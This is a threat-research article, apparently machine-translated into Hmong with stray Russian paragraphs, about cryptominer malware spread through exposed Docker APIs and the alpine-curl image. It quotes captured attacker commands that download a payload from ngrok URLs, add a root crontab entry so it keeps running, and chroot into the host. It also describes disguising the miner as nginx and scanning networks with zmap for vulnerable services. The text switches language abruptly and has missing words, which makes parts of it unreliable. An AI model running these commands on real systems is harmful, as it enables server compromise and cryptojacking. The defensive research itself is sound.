Peb tau tshuaj xyuas cov ntaub ntawv uas tau sau los ntawm cov thawv honeypot - cov no tau tsim los rau kev saib xyuas kev hem thawj - thiab pom muaj ntau yam kev ua ub no los ntawm cov neeg khawb cryptocurrency tsis xav tau lossis tsis tau tso cai uas tau xa mus ua cov thawv rogue siv cov duab Docker Hub uas tau tshaj tawm los ntawm zej zog. Cov duab no yog siv ua ib feem ntawm kev pabcuam uas xa cov malware khawb cryptocurrency.
Tsis tas li ntawd xwb, cov kev pab cuam rau kev ua haujlwm nrog cov tes hauj lwm raug teeb tsa kom nkag mus rau hauv cov thawv thiab cov ntawv thov sib ze.
Peb tawm hauv peb cov honeypots li qub, nrog lawv cov chaw teeb tsa, tsis muaj kev ntsuas kev ruaj ntseg lossis kev teeb tsa software ntxiv tom qab. Thov nco ntsoov tias Docker muaj cov lus qhia teeb tsa thawj zaug kom tsis txhob muaj qhov yuam kev thiab qhov tsis muaj zog yooj yim. Txawm li cas los xij, cov honeypots peb siv yog cov thawv tsim los nrhiav kev tawm tsam rau lub platform containerization, tsis yog cov ntawv thov hauv cov thawv.
Qhov kev ua phem uas pom tau kuj tseem ceeb vim tias nws tsis xav tau qhov tsis muaj zog thiab tsis nyob ntawm Docker version. Kev nrhiav ib daim duab thawv uas tsis raug teeb tsa, thiab yog li ntawd raug nthuav tawm yog txhua yam uas cov neeg tawm tsam xav tau los kis rau ntau lub servers uas raug nthuav tawm.
Tus Docker API uas tsis muaj cai tso cai rau tus neeg siv ua ntau yam haujlwm , suav nrog kev tau txais daim ntawv teev cov thawv uas khiav, tau txais cov cav los ntawm ib lub thawv tshwj xeeb, pib, nres (suav nrog kev yuam), thiab txawm tias tsim lub thawv tshiab los ntawm ib daim duab tshwj xeeb nrog cov chaw teeb tsa tshwj xeeb.
Sab laug yog txoj kev xa cov malware. Sab xis yog qhov chaw nyob ntawm tus neeg tawm tsam, uas tso cai rau kev xa cov duab deb.
Kev faib tawm ntawm 3762 pej xeem Docker APIs hauv lub tebchaws. Raws li kev tshawb nrhiav Shodan txij li Lub Ob Hlis 12, 2019.
Cov qauv ntawm kev tawm tsam thiab cov khoom thauj khoom
Cov Honeypots tsis yog tib txoj kev los nrhiav kev ua phem. Cov ntaub ntawv Shodan qhia tau tias tus lej ntawm Docker APIs uas raug tshaj tawm (saib daim ntawv qhia thib ob) tau nce ntxiv txij li thaum peb tshawb xyuas lub thawv tsis raug teeb tsa siv ua tus choj rau kev xa cov software Monero mining. Lub Kaum Hli tas los (2018, cov ntaub ntawv tshiab kawg muaj) kwv yees. tus txhais lus) tsuas muaj 856 qhov API qhib xwb.
Kev tshuaj xyuas cov cav ntoo honeypot tau qhia tias kev siv cov duab thawv kuj tseem cuam tshuam nrog kev siv , ib lub cuab yeej rau kev tsim kom muaj kev sib txuas ruaj ntseg lossis xa cov tsheb khiav los ntawm cov ntsiab lus uas pej xeem nkag mus rau cov chaw nyob lossis cov peev txheej tshwj xeeb (piv txwv li, localhost). Qhov no tso cai rau cov neeg tawm tsam tsim cov URLs thaum xa cov payloads mus rau lub server qhib. Hauv qab no yog cov piv txwv code los ntawm cov cav qhia txog kev siv tsis raug ntawm cov kev pabcuam ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Raws li koj tuaj yeem pom, cov ntaub ntawv uas tau uploaded raug rub tawm los ntawm cov URLs uas hloov pauv tas li. Cov URLs no muaj hnub tas sij hawm luv luv, yog li cov payloads tsis tuaj yeem rub tawm tom qab lawv tas sij hawm.
Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.
Cov ntawv sau dropper teeb tsa ob qho variables uas tom qab ntawd siv los tso cov cryptocurrency miner. Cov HOST variable muaj URL qhov twg cov ntaub ntawv phem nyob, thiab cov RIP variable yog lub npe ntaub ntawv (qhov tseeb yog hash) ntawm cov miner uas yuav tso tawm. Cov HOST variable hloov txhua zaus cov hash variable hloov. Cov ntawv sau kuj sim xyuas kom meej tias tsis muaj lwm cov cryptocurrency miners khiav ntawm lub server uas raug tawm tsam.
Piv txwv ntawm HOST thiab RIP variables, nrog rau ib daim snippet ntawm cov code siv los xyuas kom meej tias tsis muaj lwm cov miners khiav
Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.
Cov ntawv tshawb nrhiav kuj muaj nws cov yam ntxwv tshwj xeeb. Nws siv tib qho kev pabcuam URL los xa cov cuab yeej tsim nyog. Cov no suav nrog zmap binary, siv los luam theej duab network thiab tau txais cov npe ntawm cov chaw nres nkoj qhib. Cov ntawv kuj tseem rub tawm lwm lub binary siv los cuam tshuam nrog cov kev pabcuam nrhiav tau thiab khaws cov banners los ntawm lawv los txiav txim siab cov ntaub ntawv ntxiv txog cov kev pabcuam nrhiav tau (xws li nws cov version).
Cov ntawv sau kuj tseem txhais ua ntej qee qhov network ranges rau kev luam theej duab, tab sis qhov no nyob ntawm cov ntawv sau version. Nws kuj tseem qhia txog cov chaw nres nkoj los ntawm cov kev pabcuam - hauv qhov no, Docker - ua ntej khiav qhov kev luam theej duab.
Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, , Docker client 1.16, thiab Apache CouchDB. Yog tias lub server uas tau scanned phim ib qho ntawm cov no, nws raug khaws cia rau hauv cov ntaub ntawv ntawv, uas cov neeg tawm tsam tuaj yeem siv rau kev tshuaj xyuas ntxiv thiab hacking tom qab. Cov ntaub ntawv ntawv no raug xa mus rau cov servers ntawm cov neeg tawm tsam ntawm cov kev sib txuas dynamic. Qhov no txhais tau tias txhua cov ntaub ntawv muaj URL sib cais, ua rau kev nkag mus tom ntej nyuaj.
Tus vector tawm tsam siv yog Docker duab, raws li tuaj yeem pom hauv ob daim code snippets hauv qab no.
Saum toj no yog hloov lub npe mus rau qhov kev pabcuam raug cai, thiab hauv qab no yog li cas zmap siv los luam theej duab network.
Nyob rau sab saum toj yog cov network ranges uas tau teem tseg ua ntej, nyob rau hauv qab yog cov chaw nres nkoj tshwj xeeb rau kev tshawb nrhiav cov kev pabcuam, suav nrog Docker
Daim duab qhia tau hais tias daim duab alpine-curl tau raug rub tawm ntau dua 10 lab zaug.
На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать Raws li koj tuaj yeem pom hauv daim duab dhau los, daim duab no twb tau rub tawm ntau dua 10 lab zaug lawm. Cov lej rub tawm ntau no yuav qhia tau tias daim duab no tau siv ua qhov nkag; daim duab no tau hloov kho dua rau lub hlis dhau los; lwm cov duab hauv qhov chaw khaws cia no tsis tau rub tawm ntau zaus los ntawm cov neeg siv. Hauv Docker — ib pawg lus qhia siv los teeb tsa lub thawv rau kev tso tawm. Yog tias qhov nkag tau teeb tsa tsis raug (piv txwv li, lub thawv raug tso rau hauv internet), daim duab tuaj yeem siv ua lub vector tawm tsam. Cov neeg tawm tsam tuaj yeem siv nws los xa cov payloads yog tias lawv pom lub thawv tsis txhawb nqa, teeb tsa tsis raug, lossis raug nthuav tawm.
Nws yog ib qho tseem ceeb uas yuav tsum nco ntsoov tias daim duab no (alpine-curl) nws tus kheej tsis yog qhov phem, tab sis raws li pom saum toj no, nws tuaj yeem siv los ua cov haujlwm phem. Cov duab Docker zoo sib xws kuj tuaj yeem siv rau lub hom phiaj phem. Peb tau tiv tauj Docker thiab tab tom ua haujlwm nrog lawv ntawm qhov teeb meem no.
tswv yim pom zoo
seem rau ntau lub tuam txhab, tshwj xeeb tshaj yog cov uas ua haujlwm , tsom mus rau kev txhim kho sai thiab kev xa khoom. Qhov no ua rau muaj kev xav tau ua raws li kev tshuaj xyuas thiab kev saib xyuas cov cai, qhov xav tau los saib xyuas kev ceev ntiag tug ntawm cov ntaub ntawv, thiab cov nqi loj heev ntawm kev tsis ua raws li txoj cai. Kev koom ua ke kev ruaj ntseg automation rau hauv lub neej kev txhim kho tsis yog tsuas yog pab txheeb xyuas cov qhov tsis muaj kev ruaj ntseg uas yuav tsis pom tab sis kuj txo cov haujlwm tsis tsim nyog, xws li khiav cov software ntxiv rau txhua qhov tsis muaj zog lossis kev teeb tsa tsis raug tom qab kev xa daim ntawv thov.
Qhov xwm txheej uas tau tham hauv tsab xov xwm no qhia txog qhov xav tau los daws teeb meem kev ruaj ntseg txij thaum pib, suav nrog cov lus qhia hauv qab no:
- Rau cov thawj coj thiab cov neeg tsim khoom: Ib txwm xyuas koj cov chaw teeb tsa API kom paub tseeb tias lawv tau teeb tsa los tsuas yog lees txais cov lus thov los ntawm lub server lossis lub network sab hauv.
- Ua raws li lub hauv paus ntsiab lus ntawm qhov tsawg tshaj plaws txoj cai: xyuas kom meej tias cov duab thawv tau kos npe thiab txheeb xyuas, txwv tsis pub nkag mus rau cov khoom tseem ceeb (kev pabcuam tso tawm thawv), thiab encrypt cov kev sib txuas hauv network.
- Ua raws thiab ua kom muaj kev ruaj ntseg mechanisms, xws li thiab ua tiav .
- Siv kev tshuaj xyuas tsis siv neeg ntawm cov sijhawm khiav thiab cov duab kom tau txais cov ntaub ntawv ntxiv txog cov txheej txheem khiav hauv lub thawv (piv txwv li, txhawm rau nrhiav kev dag ntxias lossis tshawb nrhiav qhov tsis muaj zog). Kev tswj hwm daim ntawv thov thiab kev saib xyuas kev ncaj ncees pab nrhiav kev hloov pauv txawv txawv ntawm cov servers, cov ntaub ntawv, thiab thaj chaw system.
Trendmicro pab cov pab pawg DevOps tsim kom muaj kev nyab xeeb, xa tawm sai, thiab khiav tau txhua qhov chaw. Trend Micro Muab kev ruaj ntseg muaj zog, ua kom zoo tshaj plaws, thiab tsis siv neeg hauv lub koom haum DevOps pipeline thiab muab ntau txoj hauv kev los tiv thaiv kev hem thawj. los tiv thaiv lub cev, virtual, thiab huab workloads thaum lub sijhawm khiav. Nws kuj ntxiv kev tiv thaiv thawv nrog и , uas luam theej duab Docker thawv duab rau malware thiab qhov tsis muaj zog ntawm txhua lub sijhawm hauv txoj kab kev loj hlob kom tiv thaiv kev hem thawj ua ntej lawv raug xa mus.
Cov cim qhia txog kev sib haum xeeb
Cov hashes cuam tshuam:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
rau Cov neeg hais lus qhia txog kev hloov kho uas yuav tsum tau ua ua ntej kom txo qhov yuav tshwm sim lossis zam kom tsis txhob muaj qhov xwm txheej piav qhia saum toj no. Thiab thaum Lub Yim Hli 19-21, ntawm kev cob qhia online intensive Koj tuaj yeem tham txog cov teeb meem kev ruaj ntseg no thiab cov teeb meem zoo sib xws nrog cov npoj yaig thiab cov xib fwb xyaum ua haujlwm ntawm kev sib tham hauv lub rooj sib tham, qhov twg txhua tus tuaj yeem qhia lawv cov kev xav thiab mloog cov kev mob siab thiab kev vam meej ntawm cov npoj yaig uas muaj kev paub dhau los.
Tau qhov twg los: www.hab.com
